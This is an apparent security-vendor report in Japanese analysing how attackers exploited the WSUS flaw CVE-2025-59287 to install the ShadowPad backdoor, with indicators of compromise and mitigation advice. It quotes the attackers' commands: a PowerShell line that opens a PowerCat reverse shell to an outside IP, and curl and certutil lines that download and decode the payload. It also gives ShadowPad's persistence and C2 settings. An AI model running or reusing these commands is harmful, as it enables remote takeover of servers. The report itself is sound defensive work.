Posted By ATCP , 2025년 11월 20일

WSUS リモートコード実行脆弱性(CVE-2025-59287)を悪用した ShadowPad 攻撃事例の分析

1. 概要

AhnLab SEcurity intelligence Center(ASEC)は Microsoft Windows Server Update Services(WSUS)のリモートコード実行脆弱性(CVE-2025-59287)を悪用して ShadowPad マルウェアを配布した攻撃の状況を確認した。ShadowPadは多数の中国 APT 攻撃グループが使用しているバックドアマルウェアであり、2017年に初めて発見された後も製作者がモジュールの開発とアップデートを続けており、センチネルワンのレポートによれば中国が裏で操る APT 攻撃グループに非公開形式で販売されるものと知られている。本レポートでは、この脆弱性を悪用した初期侵入過程と ShadowPad マルウェアの動作方式および対応策を分析する。

攻撃者は WSUS サービスが有効な Windows Server を対象に CVE-2025-59287 脆弱性を悪用し、初期侵入を実行したあと、PowerShell ベースの Netcat プログラムである PowerCat オープンソースユーティリティ(https://github.com/besimorhino/powercat)を利用し、システムシェル(CMD)を取得した。その後 certutil および curl を利用し、ShadowPad マルウェアをダウンロードおよびインストールした。

2. 初期侵入(CVE-2025-59287)および拠点確保(PowerCat)

先月の10月14日、Microsoftは Microsoft Windows Server Update Services(WSUS)に存在する脆弱性に関するセキュリティ通知を掲載した。この脆弱性は Windows Server 環境で WSUS サービスが有効なサーバーに存在する脆弱性であり、システム権限でリモートコード実行が可能な深刻な脆弱性である。これに関して、10月22日に公開された PoC コード以降、10月30日 ASD(AhnLab Smart Defense)インフラではこの脆弱性が存在すると推定される Windows Server を対象に PowerCat が実行された履歴が確認された。これにより、攻撃者は対象システムの CMD シェルを取得したものと見られる。

[図1] CVE-2025-59287 を利用した PowerShell 実行ログ(PowerCat)

確認された PowerShell コマンドは以下の通りである。

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

3. マルウェアのインストール

攻撃者は、初期侵入後の11月6日に同じ脆弱性を悪用し、Windows の正常なユーティリティである curl.exe と certutil.exe を実行することによって、ShadowPad マルウェアをインストールした。

[図2] CVE-2025-59287 を通じた ShadowPad インストールログ

インストールに使用されたコマンドは以下の通りである。

curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt
certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp

4. ShadowPad

ShadowPad マルウェアは、単独の実行ファイルのみで動作せず、DLL Sideloading 手法を通じて動作するという特徴がある。今回確認された ShadowPad も、既存の他の ShadowPad 攻撃事例と同様、同じ名前を持つ EXE および DLL ファイルによって実行される。

サイドロード DLL 名	DLL MD5	正常な EXE ファイル名	EXE MD5	TMP ファイル名	TMP ファイル MD5
ETDApix.dll	27e00b5594530e8c5e004098eef2ec50	ETDCtrlHelper.exe	564e7d39a9b6da3cf0da3373351ac717	0C137A80.tmp	85b935e80e84dd47e0fa5e1dfb2c16f4

[表1] ShadowPad DLL サイドローディング情報

今回の事例では、正常な EXE ファイル(ETDCtrlHelper.exe)が実行されると ShadowPad ローダーの役割を担う DLL(ETDApix.dll)がロードされ、メモリ上で動作する。同じパスに存在する 0C137A80.tmp ファイルが、Core ShadowPad 機能を実行する。この TMP ファイルにはバックドアの Config データも含まれている。以下の[表2]は、今回の攻撃事例で確認された ShadowPad の主要 Config 情報である。

Config 項目	値
ミューテックス	Q-X64
サービス名	Q-X64
サービス表示名	Q-X64 Service
サービス説明	Q-X64 Service for windows
持続性に関するレジストリキー(Key)	SOFTWARE\Microsoft\Windows\CurrentVersion\Run
持続性に関するレジストリ値(Value)	Q-X64
持続性に関する名前	Q-X64
タスクスケジューラーファイルパス	Microsoft\Windows\UPnP
タスクスケジューラ名	Microsoft Corporation
タスクスケジューラの説明	Q-X64 Service for windows
起動時に実行されるプロセスパス #1	%ProgramFiles%\Q-X64\Q-X64.exe
起動時に実行されるプロセスパス #2	%APPDATA%\Q-X64\Q-X64.exe
起動時に実行されるプロセスパス #3	%LOCALAPPDATA%\Q-X64\Q-X64.exe
起動時に実行されるプロセスパス #4	%TEMP%\Q-X64\Q-X64.exe
サイドローディング DLL 名	ETDApix.dll
インジェクション対象プロセスパス #1	“%PROGRAMFILES%\Windows Mail\WinMail.exe” Q-X64
インジェクション対象プロセスパス #2	“%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe” Q-X64
インジェクション対象プロセスパス #3	“%ProgramFiles%\Windows Media Player\wmplayer.exe” Q-X64
インジェクション対象プロセスパス #4	“%SystemRoot%\system32\svchost.exe” Q-X64
C&C #1	HTTP://163.61.102[.]245:443
C&C #2	HTTPS://163.61.102[.]245:443
プロキシ IP #1	N/A
プロキシ IP #2	N/A
プロキシ IP #3	N/A
プロキシ IP #4	N/A
C&C 通信のためのヘッダー #1	POST
C&C 通信のためのヘッダー #2	65536
C&C 通信のためのヘッダー #3	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
C&C 通信のためのヘッダー #4	Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
C&C 通信のためのヘッダー #5	Accept-Encoding: gzip, deflate
C&C 通信のためのヘッダー #6	Accept: text/html, application/xhtml+xml, image/jxr, /
C&C 通信のためのヘッダー #7	N/A
フォワード TCP IP	レジストリ必要
フォワード UDP IP	レジストリ必要
持続性等に登録されたファイル名	N/A

[表2] ShadowPad 関連 Config 情報

5. 結論

脆弱性の PoC コードが公開された後、攻撃者はこれを素早く悪用し WSUS サーバーを通じて ShadowPad マルウェアを配布した。この脆弱性は、システム権限でリモートコードが実行される可能性があり、被害範囲が非常に大きくなる可能性がある。そのため、WSUS を使用している企業のセキュリティ担当者は以下のような措置を迅速に実行する必要がある。

Microsoft が提供する最新のセキュリティアップデート(CVE-2025-59287 関連パッチ) 適用
WSUS サーバーの外部公開の有無およびアクセス制御設定のチェック(Microsoft アップデートサーバーのみ WSUS にアクセスを許可し、残りのトラフィックに関しては TCP ポート 8530、8531 インバウンドトラフィック遮断検討)
疑わしい PowerShell、certutil.exe、curl.exe コマンドの実行履歴およびネットワーク接続ログのチェック

MD5

27e00b5594530e8c5e004098eef2ec50

85b935e80e84dd47e0fa5e1dfb2c16f4

URL

http[:]//149[.]28[.]78[.]189[:]42306/dll[.]txt

http[:]//149[.]28[.]78[.]189[:]42306/exe[.]txt

http[:]//149[.]28[.]78[.]189[:]42306/tmp[.]txt

149[.]28[.]78[.]189

154[.]17[.]26[.]41

163[.]61[.]102[.]245

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: Uncategorized